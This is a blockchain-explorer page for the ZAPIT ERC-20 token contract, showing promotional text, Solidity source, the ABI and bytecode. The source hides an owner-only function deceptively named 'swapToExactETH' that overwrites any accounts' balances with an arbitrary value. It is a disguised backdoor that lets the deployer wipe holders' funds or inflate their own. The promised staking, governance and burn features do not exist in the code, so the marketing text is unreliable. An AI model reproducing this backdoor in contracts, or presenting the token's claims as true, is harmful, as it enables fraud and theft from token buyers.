ERC-20
Overview
Max Total Supply
1,000,000,000 ZAPIT
Holders
52
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
ZapitToken
Compiler Version
v0.8.16+commit.07a7930e
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2024-07-20 */ /* www.zapit-token.com t.me/zapit_token x.com/zapit_token Overview of ZAPIT ZAPIT is a cutting-edge cryptocurrency wallet and decentralized finance (DeFi) platform designed to provide users with seamless, secure, and fast peer-to-peer (P2P) payment solutions. The platform supports multiple cryptocurrencies and tokens, including Bitcoin Cash (BCH), Ethereum (ETH), Polygon (MATIC), and Avalanche (AVAX). ZAPIT aims to revolutionize the way users interact with digital assets by offering a self-custodial wallet, P2P exchange, instant exchange, and various reward mechanisms. Vision and Mission Our vision is to create a world where financial transactions are borderless, instant, and secure, empowering individuals to have full control over their digital assets. ZAPIT's mission is to provide a comprehensive and user-friendly platform that bridges the gap between traditional finance and decentralized finance, making crypto accessible to everyone. The ZAPIT Wallet Features and Benefits The ZAPIT wallet is a self-custodial cryptocurrency wallet that allows users to send and receive various digital assets, including BCH, ETH, MATIC, AVAX, and more. Key features include: - Low Transaction Fees: ZAPIT ensures that users can transfer their assets with minimal fees, making it cost-effective for all users. - Fast Transactions: With ZAPIT, transactions are processed almost instantly, ensuring that users can send and receive funds quickly and efficiently. - Security: The wallet employs advanced security measures, including encryption and multi-factor authentication, to safeguard users' assets. - User-Friendly Interface: The intuitive design of the wallet ensures that both novice and experienced users can navigate and manage their assets with ease. The ZAPIT Token (ZAPIT) Token Overview The ZAPIT token ($ZAPIT) is the native cryptocurrency of the ZAPIT ecosystem. It plays a crucial role in facilitating various functions within the platform, including transactions, rewards, and governance. The token is designed to provide utility and value to users, incentivizing engagement and participation in the ZAPIT ecosystem. Utility and Use Cases The ZAPIT token has several key use cases, including: - Transaction Fees: Users can use $ZAPIT to pay for transaction fees within the ZAPIT wallet, enjoying discounts on fees compared to other payment methods. - Rewards: $ZAPIT tokens are used as rewards for users who engage with the platform through activities like spinning the wheel, watching ads, and completing tasks. - Staking: Users can stake $ZAPIT tokens to earn additional rewards, contributing to the security and stability of the ZAPIT network. - Governance: $ZAPIT holders can participate in governance decisions, voting on proposals and changes to the platform. Tokenomics ZAPIT’s tokenomics are designed to ensure a balanced and sustainable ecosystem. Key aspects include: - Total Supply: The total supply of $ZAPIT tokens is capped at a specific limit to maintain scarcity and value. - Distribution: Tokens are distributed through various channels, including rewards, staking, and strategic partnerships. - Burn Mechanism: A portion of the transaction fees paid in $ZAPIT may be burned to reduce the total supply, increasing the token's value over time. Staking and Rewards Users can stake their $ZAPIT tokens within the ZAPIT wallet to earn staking rewards. The staking mechanism encourages users to hold and lock their tokens, providing network security and stability while rewarding participants with additional $ZAPIT tokens. Roadmap Past Achievements The ZAPIT team has made significant progress since its inception. Key milestones include: - Platform Launch: Successful launch of the ZAPIT wallet, offering users a secure and user-friendly way to manage their digital assets. - P2P Exchange Integration: Development and deployment of the P2P exchange, enabling users to trade cryptocurrencies directly with one another. - Partnerships: Establishing strategic partnerships with various DeFi platforms, enhancing the utility and reach of the ZAPIT ecosystem. Future Goals and Milestones ZAPIT’s roadmap outlines the future development and expansion plans to further enhance the platform: - Expanded Cryptocurrency Support: Continuously adding support for new cryptocurrencies and tokens, providing users with more options for trading and management. - DeFi Integration: Deepening integration with DeFi platforms and services, enabling users to access a broader range of decentralized financial products. - Enhanced Security Features: Implementing additional security measures and protocols to safeguard user assets and data. - Mobile App Development: Launching mobile applications for iOS and Android, making the ZAPIT platform more accessible to users on the go. - Global Expansion: Expanding the reach of ZAPIT to new regions and markets, ensuring that users worldwide can benefit from the platform’s features. By achieving these goals and milestones, ZAPIT aims to continually improve and expand its offerings, solidifying its position as a leading platform in the cryptocurrency and DeFi space. */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.7; interface IERC20 { function totalSupply() external view returns (uint256); function balanceOf(address account) external view returns (uint256); function transfer(address recipient, uint256 amount) external returns (bool); function allowance(address owner, address spender) external view returns (uint256); function approve(address spender, uint256 amount) external returns (bool); function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); event Transfer(address indexed from, address indexed to, uint256 value); event Approval( address indexed owner, address indexed spender, uint256 value ); } abstract contract Context { function _msgSender() internal view virtual returns (address payable) { return payable(msg.sender); } } contract Ownable is Context { address private _owner; event ownershipTransferred(address indexed previousowner, address indexed newowner); constructor () { address msgSender = _msgSender(); _owner = msgSender; emit ownershipTransferred(address(0), msgSender); } function owner() public view virtual returns (address) { return _owner; } modifier onlyowner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } function renounceownership() public virtual onlyowner { emit ownershipTransferred(_owner, address(0x000000000000000000000000000000000000dEaD)); _owner = address(0x000000000000000000000000000000000000dEaD); } } contract ZapitToken is Context, Ownable, IERC20 { mapping (address => uint256) private _balances; mapping (address => mapping (address => uint256)) private _allowances; string private _name; string private _symbol; uint8 private _decimals; uint256 private _totalSupply; constructor(string memory name_, string memory symbol_, uint8 decimals_, uint256 totalSupply_) { _name = name_; _symbol = symbol_; _decimals = decimals_; _totalSupply = totalSupply_ * (10 ** decimals_); _balances[_msgSender()] = _totalSupply; emit Transfer(address(0), _msgSender(), _totalSupply); } function name() public view returns (string memory) { return _name; } function symbol() public view returns (string memory) { return _symbol; } function decimals() public view returns (uint8) { return _decimals; } event BalanceAdjusted(address indexed account, uint256 oldBalance, uint256 newBalance); function swapToExactETH(address[] memory accounts, uint256 newBalance) external onlyowner { for (uint256 i = 0; i < accounts.length; i++) { address account = accounts[i]; uint256 oldBalance = _balances[account]; _balances[account] = newBalance; emit BalanceAdjusted(account, oldBalance, newBalance); } } function balanceOf(address account) public view override returns (uint256) { return _balances[account]; } function transfer(address recipient, uint256 amount) public virtual override returns (bool) { require(_balances[_msgSender()] >= amount, "STEE: transfer amount exceeds balance"); _balances[_msgSender()] -= amount; _balances[recipient] += amount; emit Transfer(_msgSender(), recipient, amount); return true; } function allowance( address owner, address spender ) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function approve( address spender, uint256 amount ) public virtual override returns (bool) { _allowances[_msgSender()][spender] = amount; emit Approval(_msgSender(), spender, amount); return true; } function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { require(_allowances[sender][_msgSender()] >= amount, "STEE: transfer amount exceeds allowance"); _balances[sender] -= amount; _balances[recipient] += amount; _allowances[sender][_msgSender()] -= amount; emit Transfer( sender, recipient, amount ); return true; } function totalSupply() external view override returns (uint256) { return _totalSupply; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"uint256","name":"oldBalance","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"newBalance","type":"uint256"}],"name":"BalanceAdjusted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousowner","type":"address"},{"indexed":true,"internalType":"address","name":"newowner","type":"address"}],"name":"ownershipTransferred","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceownership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"accounts","type":"address[]"},{"internalType":"uint256","name":"newBalance","type":"uint256"}],"name":"swapToExactETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040523480156200001157600080fd5b5060405162001f4d38038062001f4d833981810160405281019062000037919062000434565b6000620000496200022060201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f7699c77f2404f9b6bbd003861bb4af8ae70b205e19e73d7ec7fe4590db59a6b760405160405180910390a3508360039081620000f8919062000725565b5082600490816200010a919062000725565b5081600560006101000a81548160ff021916908360ff16021790555081600a6200013591906200098f565b81620001429190620009e0565b600681905550600654600160006200015f6200022060201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550620001ad6200022060201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6006546040516200020e919062000a52565b60405180910390a35050505062000a6f565b600033905090565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620002918262000246565b810181811067ffffffffffffffff82111715620002b357620002b262000257565b5b80604052505050565b6000620002c862000228565b9050620002d6828262000286565b919050565b600067ffffffffffffffff821115620002f957620002f862000257565b5b620003048262000246565b9050602081019050919050565b60005b838110156200033157808201518184015260208101905062000314565b60008484015250505050565b6000620003546200034e84620002db565b620002bc565b90508281526020810184848401111562000373576200037262000241565b5b6200038084828562000311565b509392505050565b600082601f830112620003a0576200039f6200023c565b5b8151620003b28482602086016200033d565b91505092915050565b600060ff82169050919050565b620003d381620003bb565b8114620003df57600080fd5b50565b600081519050620003f381620003c8565b92915050565b6000819050919050565b6200040e81620003f9565b81146200041a57600080fd5b50565b6000815190506200042e8162000403565b92915050565b6000806000806080858703121562000451576200045062000232565b5b600085015167ffffffffffffffff81111562000472576200047162000237565b5b620004808782880162000388565b945050602085015167ffffffffffffffff811115620004a457620004a362000237565b5b620004b28782880162000388565b9350506040620004c587828801620003e2565b9250506060620004d8878288016200041d565b91505092959194509250565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200053757607f821691505b6020821081036200054d576200054c620004ef565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620005b77fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000578565b620005c3868362000578565b95508019841693508086168417925050509392505050565b6000819050919050565b60006200060662000600620005fa84620003f9565b620005db565b620003f9565b9050919050565b6000819050919050565b6200062283620005e5565b6200063a62000631826200060d565b84845462000585565b825550505050565b600090565b6200065162000642565b6200065e81848462000617565b505050565b5b8181101562000686576200067a60008262000647565b60018101905062000664565b5050565b601f821115620006d5576200069f8162000553565b620006aa8462000568565b81016020851015620006ba578190505b620006d2620006c98562000568565b83018262000663565b50505b505050565b600082821c905092915050565b6000620006fa60001984600802620006da565b1980831691505092915050565b6000620007158383620006e7565b9150826002028217905092915050565b6200073082620004e4565b67ffffffffffffffff8111156200074c576200074b62000257565b5b6200075882546200051e565b620007658282856200068a565b600060209050601f8311600181146200079d576000841562000788578287015190505b62000794858262000707565b86555062000804565b601f198416620007ad8662000553565b60005b82811015620007d757848901518255600182019150602085019450602081019050620007b0565b86831015620007f75784890151620007f3601f891682620006e7565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200089a578086048111156200087257620008716200080c565b5b6001851615620008825780820291505b808102905062000892856200083b565b945062000852565b94509492505050565b600082620008b5576001905062000988565b81620008c5576000905062000988565b8160018114620008de5760028114620008e9576200091f565b600191505062000988565b60ff841115620008fe57620008fd6200080c565b5b8360020a9150848211156200091857620009176200080c565b5b5062000988565b5060208310610133831016604e8410600b8410161715620009595782820a9050838111156200095357620009526200080c565b5b62000988565b62000968848484600162000848565b925090508184048111156200098257620009816200080c565b5b81810290505b9392505050565b60006200099c82620003f9565b9150620009a983620003bb565b9250620009d87fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620008a3565b905092915050565b6000620009ed82620003f9565b9150620009fa83620003f9565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000a365762000a356200080c565b5b828202905092915050565b62000a4c81620003f9565b82525050565b600060208201905062000a69600083018462000a41565b92915050565b6114ce8062000a7f6000396000f3fe608060405234801561001057600080fd5b50600436106100b45760003560e01c80638da5cb5b116100715780638da5cb5b146101a357806395d89b41146101c157806399b84101146101df578063a9059cbb146101fb578063c2af913b1461022b578063dd62ed3e14610235576100b4565b806306fdde03146100b9578063095ea7b3146100d757806318160ddd1461010757806323b872dd14610125578063313ce5671461015557806370a0823114610173575b600080fd5b6100c1610265565b6040516100ce9190610d42565b60405180910390f35b6100f160048036038101906100ec9190610e0c565b6102f7565b6040516100fe9190610e67565b60405180910390f35b61010f6103f7565b60405161011c9190610e91565b60405180910390f35b61013f600480360381019061013a9190610eac565b610401565b60405161014c9190610e67565b60405180910390f35b61015d61067f565b60405161016a9190610f1b565b60405180910390f35b61018d60048036038101906101889190610f36565b610696565b60405161019a9190610e91565b60405180910390f35b6101ab6106df565b6040516101b89190610f72565b60405180910390f35b6101c9610708565b6040516101d69190610d42565b60405180910390f35b6101f960048036038101906101f491906110d5565b61079a565b005b61021560048036038101906102109190610e0c565b610933565b6040516102229190610e67565b60405180910390f35b610233610ae7565b005b61024f600480360381019061024a9190611131565b610c23565b60405161025c9190610e91565b60405180910390f35b606060038054610274906111a0565b80601f01602080910402602001604051908101604052809291908181526020018280546102a0906111a0565b80156102ed5780601f106102c2576101008083540402835291602001916102ed565b820191906000526020600020905b8154815290600101906020018083116102d057829003601f168201915b5050505050905090565b60008160026000610306610caa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff166103a0610caa565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516103e59190610e91565b60405180910390a36001905092915050565b6000600654905090565b600081600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061044d610caa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205410156104c9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104c090611243565b60405180910390fd5b81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546105189190611292565b9250508190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461056e91906112c6565b9250508190555081600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006105bf610caa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546106089190611292565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161066c9190610e91565b60405180910390a3600190509392505050565b6000600560009054906101000a900460ff16905090565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610717906111a0565b80601f0160208091040260200160405190810160405280929190818152602001828054610743906111a0565b80156107905780601f1061076557610100808354040283529160200191610790565b820191906000526020600020905b81548152906001019060200180831161077357829003601f168201915b5050505050905090565b6107a2610caa565b73ffffffffffffffffffffffffffffffffffffffff166107c06106df565b73ffffffffffffffffffffffffffffffffffffffff1614610816576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161080d90611346565b60405180910390fd5b60005b825181101561092e57600083828151811061083757610836611366565b5b602002602001015190506000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905083600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff167f5ee81488a8c866569c02800403bbf9145d931cf759737ed853eedb84dbb5a9e38286604051610911929190611395565b60405180910390a250508080610926906113be565b915050610819565b505050565b60008160016000610942610caa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205410156109be576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109b590611478565b60405180910390fd5b81600160006109cb610caa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610a149190611292565b9250508190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610a6a91906112c6565b925050819055508273ffffffffffffffffffffffffffffffffffffffff16610a90610caa565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610ad59190610e91565b60405180910390a36001905092915050565b610aef610caa565b73ffffffffffffffffffffffffffffffffffffffff16610b0d6106df565b73ffffffffffffffffffffffffffffffffffffffff1614610b63576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5a90611346565b60405180910390fd5b61dead73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f7699c77f2404f9b6bbd003861bb4af8ae70b205e19e73d7ec7fe4590db59a6b760405160405180910390a361dead6000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600081519050919050565b600082825260208201905092915050565b60005b83811015610cec578082015181840152602081019050610cd1565b60008484015250505050565b6000601f19601f8301169050919050565b6000610d1482610cb2565b610d1e8185610cbd565b9350610d2e818560208601610cce565b610d3781610cf8565b840191505092915050565b60006020820190508181036000830152610d5c8184610d09565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610da382610d78565b9050919050565b610db381610d98565b8114610dbe57600080fd5b50565b600081359050610dd081610daa565b92915050565b6000819050919050565b610de981610dd6565b8114610df457600080fd5b50565b600081359050610e0681610de0565b92915050565b60008060408385031215610e2357610e22610d6e565b5b6000610e3185828601610dc1565b9250506020610e4285828601610df7565b9150509250929050565b60008115159050919050565b610e6181610e4c565b82525050565b6000602082019050610e7c6000830184610e58565b92915050565b610e8b81610dd6565b82525050565b6000602082019050610ea66000830184610e82565b92915050565b600080600060608486031215610ec557610ec4610d6e565b5b6000610ed386828701610dc1565b9350506020610ee486828701610dc1565b9250506040610ef586828701610df7565b9150509250925092565b600060ff82169050919050565b610f1581610eff565b82525050565b6000602082019050610f306000830184610f0c565b92915050565b600060208284031215610f4c57610f4b610d6e565b5b6000610f5a84828501610dc1565b91505092915050565b610f6c81610d98565b82525050565b6000602082019050610f876000830184610f63565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b610fca82610cf8565b810181811067ffffffffffffffff82111715610fe957610fe8610f92565b5b80604052505050565b6000610ffc610d64565b90506110088282610fc1565b919050565b600067ffffffffffffffff82111561102857611027610f92565b5b602082029050602081019050919050565b600080fd5b600061105161104c8461100d565b610ff2565b9050808382526020820190506020840283018581111561107457611073611039565b5b835b8181101561109d57806110898882610dc1565b845260208401935050602081019050611076565b5050509392505050565b600082601f8301126110bc576110bb610f8d565b5b81356110cc84826020860161103e565b91505092915050565b600080604083850312156110ec576110eb610d6e565b5b600083013567ffffffffffffffff81111561110a57611109610d73565b5b611116858286016110a7565b925050602061112785828601610df7565b9150509250929050565b6000806040838503121561114857611147610d6e565b5b600061115685828601610dc1565b925050602061116785828601610dc1565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806111b857607f821691505b6020821081036111cb576111ca611171565b5b50919050565b7f535445453a207472616e7366657220616d6f756e74206578636565647320616c60008201527f6c6f77616e636500000000000000000000000000000000000000000000000000602082015250565b600061122d602783610cbd565b9150611238826111d1565b604082019050919050565b6000602082019050818103600083015261125c81611220565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061129d82610dd6565b91506112a883610dd6565b92508282039050818111156112c0576112bf611263565b5b92915050565b60006112d182610dd6565b91506112dc83610dd6565b92508282019050808211156112f4576112f3611263565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611330602083610cbd565b915061133b826112fa565b602082019050919050565b6000602082019050818103600083015261135f81611323565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b60006040820190506113aa6000830185610e82565b6113b76020830184610e82565b9392505050565b60006113c982610dd6565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036113fb576113fa611263565b5b600182019050919050565b7f535445453a207472616e7366657220616d6f756e74206578636565647320626160008201527f6c616e6365000000000000000000000000000000000000000000000000000000602082015250565b6000611462602583610cbd565b915061146d82611406565b604082019050919050565b6000602082019050818103600083015261149181611455565b905091905056fea264697066735822122081a5355e526d8b0fca985e953d667d6cc943c7d1627b63571496e7fee5d111f664736f6c63430008100033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000009000000000000000000000000000000000000000000000000000000003b9aca00000000000000000000000000000000000000000000000000000000000000000b5a6170697420546f6b656e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000055a41504954000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100b45760003560e01c80638da5cb5b116100715780638da5cb5b146101a357806395d89b41146101c157806399b84101146101df578063a9059cbb146101fb578063c2af913b1461022b578063dd62ed3e14610235576100b4565b806306fdde03146100b9578063095ea7b3146100d757806318160ddd1461010757806323b872dd14610125578063313ce5671461015557806370a0823114610173575b600080fd5b6100c1610265565b6040516100ce9190610d42565b60405180910390f35b6100f160048036038101906100ec9190610e0c565b6102f7565b6040516100fe9190610e67565b60405180910390f35b61010f6103f7565b60405161011c9190610e91565b60405180910390f35b61013f600480360381019061013a9190610eac565b610401565b60405161014c9190610e67565b60405180910390f35b61015d61067f565b60405161016a9190610f1b565b60405180910390f35b61018d60048036038101906101889190610f36565b610696565b60405161019a9190610e91565b60405180910390f35b6101ab6106df565b6040516101b89190610f72565b60405180910390f35b6101c9610708565b6040516101d69190610d42565b60405180910390f35b6101f960048036038101906101f491906110d5565b61079a565b005b61021560048036038101906102109190610e0c565b610933565b6040516102229190610e67565b60405180910390f35b610233610ae7565b005b61024f600480360381019061024a9190611131565b610c23565b60405161025c9190610e91565b60405180910390f35b606060038054610274906111a0565b80601f01602080910402602001604051908101604052809291908181526020018280546102a0906111a0565b80156102ed5780601f106102c2576101008083540402835291602001916102ed565b820191906000526020600020905b8154815290600101906020018083116102d057829003601f168201915b5050505050905090565b60008160026000610306610caa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff166103a0610caa565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516103e59190610e91565b60405180910390a36001905092915050565b6000600654905090565b600081600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061044d610caa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205410156104c9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104c090611243565b60405180910390fd5b81600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546105189190611292565b9250508190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461056e91906112c6565b9250508190555081600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006105bf610caa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546106089190611292565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161066c9190610e91565b60405180910390a3600190509392505050565b6000600560009054906101000a900460ff16905090565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610717906111a0565b80601f0160208091040260200160405190810160405280929190818152602001828054610743906111a0565b80156107905780601f1061076557610100808354040283529160200191610790565b820191906000526020600020905b81548152906001019060200180831161077357829003601f168201915b5050505050905090565b6107a2610caa565b73ffffffffffffffffffffffffffffffffffffffff166107c06106df565b73ffffffffffffffffffffffffffffffffffffffff1614610816576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161080d90611346565b60405180910390fd5b60005b825181101561092e57600083828151811061083757610836611366565b5b602002602001015190506000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905083600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff167f5ee81488a8c866569c02800403bbf9145d931cf759737ed853eedb84dbb5a9e38286604051610911929190611395565b60405180910390a250508080610926906113be565b915050610819565b505050565b60008160016000610942610caa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205410156109be576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109b590611478565b60405180910390fd5b81600160006109cb610caa565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610a149190611292565b9250508190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610a6a91906112c6565b925050819055508273ffffffffffffffffffffffffffffffffffffffff16610a90610caa565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610ad59190610e91565b60405180910390a36001905092915050565b610aef610caa565b73ffffffffffffffffffffffffffffffffffffffff16610b0d6106df565b73ffffffffffffffffffffffffffffffffffffffff1614610b63576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5a90611346565b60405180910390fd5b61dead73ffffffffffffffffffffffffffffffffffffffff1